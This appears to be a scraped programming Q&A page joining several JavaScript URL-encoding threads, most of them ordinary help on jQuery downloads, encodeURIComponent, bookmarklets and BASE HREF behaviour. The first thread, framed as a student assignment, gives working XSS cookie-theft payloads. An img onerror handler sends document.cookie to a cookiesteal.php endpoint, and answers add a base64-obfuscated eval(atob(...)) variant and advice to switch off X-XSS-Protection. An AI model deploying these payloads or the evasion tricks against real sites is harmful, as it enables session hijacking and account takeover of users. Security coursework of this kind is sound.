How to append var to var.src without using + - javascript

Im trying to do an XSS attack for an assignment, injecting some code, however the server is set up to strip most HTML tags, but I am able to inject using img tag and onerror. When injecting, I can't seem to get the syntax right as it takes away my "+" in my string append (trying to attach cookie to the source I'm using).
<img src="img.gif"
onerror="var img = document.createElement('img'); img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;">
When i check this after injection (in inspect element) it shows the script, but the plus symbol at the end is missing. is there another way to append this cookie to the img.src without using the +?
UPDATE:
I got the plus in there and now the Event Listener has activated. But ive tried using onerror, onload, onmouseover and nothing is activating the code, im not receiving the admin cookie.

Try using using %2B instead of +
https://www.w3schools.com/tags/ref_urlencode.asp

Try this on error
eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))
what I have done,
Take the code as a string and convert to base64 btoa()
eval can execute a sting as a code, but we need to decode it first atob dose that
hence eval(atob('encoded code'));
the encoded code
`var img = document.createElement('img');
img.src='http://localhost/cookiesteal.php?cookie='+ document.cookie;`
So your end it should look like
<img src="img.gif" onerror="eval(atob('dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2ltZycpOwoJIGltZy5zcmM9J2h0dHA6Ly9sb2NhbGhvc3QvY29va2llc3RlYWwucGhwP2Nvb2tpZT0nKyBkb2N1bWVudC5jb29raWU7'))">

Use encodeURIComponent
<img src="img.gif" onerror="var img = document.createElement('img'); img.src=encodeURIComponent('http://localhost/cookiesteal.php?cookie='+ document.cookie);">

It should work fine if you properly encode the injected script.
The only error you may get is if XSS protection is On.
You can disable it by sending the response header
("X-XSS-Protection", 0)
What does your console report as an error?

Related

how to download file using jquery in asp.net core?

I use this code to download file using jquery.
$('#dwnlod').click(function (ee) {
e.preventDefault();
var currentFile = $('#SlideContainer .actv').css('background-image').replace(/^url|[\(\)]/g, '');
alert(currentFile)
document.location.href = currentFile;
});
However, it always does nothing. the reason for this is when I remove e.preventDefault to read the URL I find it distorted.
it rather than the result from alert >>
"https://localhost:660066/Uploads/5c92f430-4aef-41c8-b201-853597935771.jpg"
it displays in a new browser tab >>
https://localhost:660066/Documents/Index/"https://localhost:660066/Uploads/5c92f430-4aef-41c8-b201-853597935771.jpg"
I don't know if I need extra steps with asp.net core routing !!?
It looks like the issue is that currentFile returns a string that is surrounded by quotes and thus the browser is interpreting it as a relative URL (since the scheme isn't at the beginning of the string). Removing the start and end quotes if they exist should get you the behavior you are looking for.

How to escape absolute URI?

In the script: `http://theip.com/something/index.php
I have the following javascript URI:
var uri = '/something/script.php?=' + someDynamicValue
That I pass to a function "loadHTML(url, div)"
someDynamicValue can contain spaces and other symbols which make JQuery crash with $.load().
So, I try to encode uri:
$('#'+div).load(encodeURIComponent(uri));
And gives
http://theip.com/something/%2Fsomething%2Fscript.php%3Fq%3D?_=1399924421585
That is, duplicating the /something (which should be an absolute URL so it should go to http://ip.com/something/script.php)
Now if I do the following:
$('#'+div).load(encodeURIComponent(uri).replace(/%2F/g,'/'));
I get a "good" url but gives 404 Error:
http://theip.com/something/script.php%3Fq%3D?_=1399923477529
So I guess it is taking script.php%3Fq%3D?_=1399923477529 as a literal script name, maybe.
How can I fix it? (Encode the rest of the URL).
Thanks!
You just need to encode the one part that isn't already properly URI encoded:
var uri = '/something/script.php?foo=' + encodeURIComponent(someDynamicValue)
$('#'+div).load(uri);

Encode captured JavaScript code to alert it

I capture the lines of code around JavaScript errors in order to find and fix them much quicker. In my log when I click on the line number I'm trying to make it alert the lines where the error occurred. Here is an example of the current output...
javascript:alert(encode('var clickCycle = 37;
window.onload = function(e)
{
var a = JSON.parse(localStorage.getItem('email_tab'));
try {var a = top.window.location.href;}
catch (err)
{
'));
It's late so I'm not sure if I should be encoding via PHP at the server or just encode it via JavaScript?
I need to make sure that if there are quotes or other code symbols that they appear in the alert() as they do in the code.
For security problem, i think you just encode it at server before response to client. And at client side you don't need encode through on javascript
A string replace did the trick...
<a href="javascript:alert(\'';
$sp = str_ireplace("'","\'",$row1['lines']);
echo htmlspecialchars($sp).'\');" tabindex="3">'.$row1['line'].'</a>

JavaScript bookmarklet and URL encoding

Fully disclosing that I do not know Javascript, I'm trying to get this Javascript:
javascript:location = 'http://validator.w3.org/check?uri=' +escape(location)&doctype=Inline&charset=detect+automatically&ss=1&group=0&user-agent=W3C_Validator/1.654';
to work as a Bookmarklet in order to send a URL of this format:
http://validator.w3.org/check?uri=http://www.wordpress.org&charset=%28detect+automatically%29&doctype=Inline&ss=1&group=0&user-agent=W3C_Validator%2F1.654
to the W3C valdiator.
I'm URL encoding the Javascript with this encoder, but of course, I'm doing something wrong, either in my Javascript or in the process of encoding it.
Anyone have some ideas in particular or in general about Javascript bookmarklets and URL encoding? Thanks.
Two Errors:
You need to access the "href" member of the location object:
window.location.href = http://foo.com
You have invalid JavaScript:
javascript:location = 'http://validator.w3.org/check?uri=' +escape(location)PLUS SIGN AND QUOTE MISSING HERE&doctype=Inline&charset=detect+automatically&ss=1&group=0&user-agent=W3C_Validator/1.654';
I recommend using this:
javascript:(function(){window.location.href='http://validator.w3.org/check?uri='+escape(window.location.href)+'&doctype=Inline&charset=detect+automatically&ss=1&group=0&user-agent=W3C_Validator/1.654';})()

BASE HREF, javascript, and Internet Explorer vs. Firefox

Question:
IE and Firefox / Safari seem to deal differently with BASE HREF and Javascript window.location type requests. First, is this an accurate description of the problem? What's going on? And what's the best cross-browser solution to deal with this situation?
Context:
I have a small PHP flat file sitelet (it's actually a usability testing prototype).
I dynamically generate the BASE tag's HREF value in PHP, i.e. if it's running on our company's server, it's:
$basehref = 'http://www.example.com/alpha/bravo/UsabilityTest/';
and on my local dev machine, it's:
$basehref = 'http://ellen.local/delta/echo/foxtrot/UsabilityTest/';
For one of the tasks, I collect some user input, do some transformations on it in Javascript, and send to the server using code like this:
function allDone() {
// elided code for simplicity of stackoverflow question
var URI = "ProcessUserInput.php?";
URI = URI + "alphakeys=" + encodeURI( keys.join(",") );
URI = URI + "&sortedvalues=" + encodeURI( values.join(",") );
window.location = URI;
}
Both the javascript file (containing function allDone()) and the processing PHP script (ProcessUserInput.php) live in a subdirectory of UsabilityTest. In other words, their actual URL is
http://www.example.com/alpha/bravo/UsabilityTest/foxtrot/ProcessUserInput.php
aka
$basehref . '/foxtrot/ProcessUserInput.php'
The Problem
IE's JavaScript basically seems to ignore the BASE HREF. The javascript and the PHP processor live in the same directory, so the call to ProcessUserInput.php works out fine. The input gets processed and everything works fine.
But when I test on Firefox, the JavaScript does appear to use the BASE HREF, because the script's output gets sent to
$basehref . '/ProcessUserInput.php'
This breaks, because ProcessUserInput.php is in a subdirectory of basehref. However, if I add the subdirectory name to the javascript, it no longer works in IE.
Solutions?
I can think of a few ways to solve this:
In Javascript, read the HREF property of the BASE tag and manually prepend to var URI in the javascript, calling a fully-resolved absolute URL
Process the .js file with PHP and insert the $basehref variable into the script
Move the files around
Something else?
I'm sure there must be other ways to solve this too. What's the best way to deal with BASE HREF in JavaScript when IE and Firefox apply it differently in JavaScript?
Using the assign method of window.location seems like the most straightforward answer.
Instead of
window.location = URI;
I'm using this:
window.location.assign( URI );
which is doing the right thing in both IE and Firefox.
IE and Firefox / Safari seem to deal differently with BASE HREF and Javascript window.location type requests.
Yes, this is a long-standing difference going back to the early days of Netscape-vs-IE.
IE enforces base-href only at the point a document element is interacted-with. So, you can createElement('a'), set a relative href and click() it*, but the base-href will be ignored; appendChild it to the document containing the base-href, and it'll work.
On the other browsers the base-href is taken as global per-window and always applied. Which is right? It seems to be unspecified. The original JavaScript docs say only that location.hash (and hence, location applied as a string):
represents a complete URL
So setting it to a relative URL would seem to be an undefined operation.
(*: link.click() is a non-standard method supported by IE and Opera)
read the HREF property of the BASE tag and manually prepend
Probably what I'd do, yeah, if you're dead set on using <base>.
I believe you want to modify window.location.pathname, not window.location. window.location is a Location object, that has multiple variables. As a result, the effects of changing it is not well defined. However, window.location.pathname is defined as the path relative to the host, which is what you want.
If you want to read up more on the many variables you can change in window.location, I'd check here. According to Mozilla's documentation, changing any variable in window.location should reload the page with a new URL corresponding to those changes.
I had the same problem today, after some researching, couldn´t findn any way to override this issue in IE9, what is a requiremente for my project, so, i did the following approach (jquery based, but it´s really easy to make it in simple javascript).
href = function(url){
if ($("base").length > 0 ){
location.href= $("base").attr("href")+url;
}else{
location.href = url;
}
}
And then, change
location.href= 'emp/start'
to
href('emp/start');
just add $('base').attr('href') before the link. (using jquery) or
document.getElementBytagname('base').href
You can always use Vanilla JS :)
var href = document.getElementBytagname('base')[0].href
I hope this helps.

Categories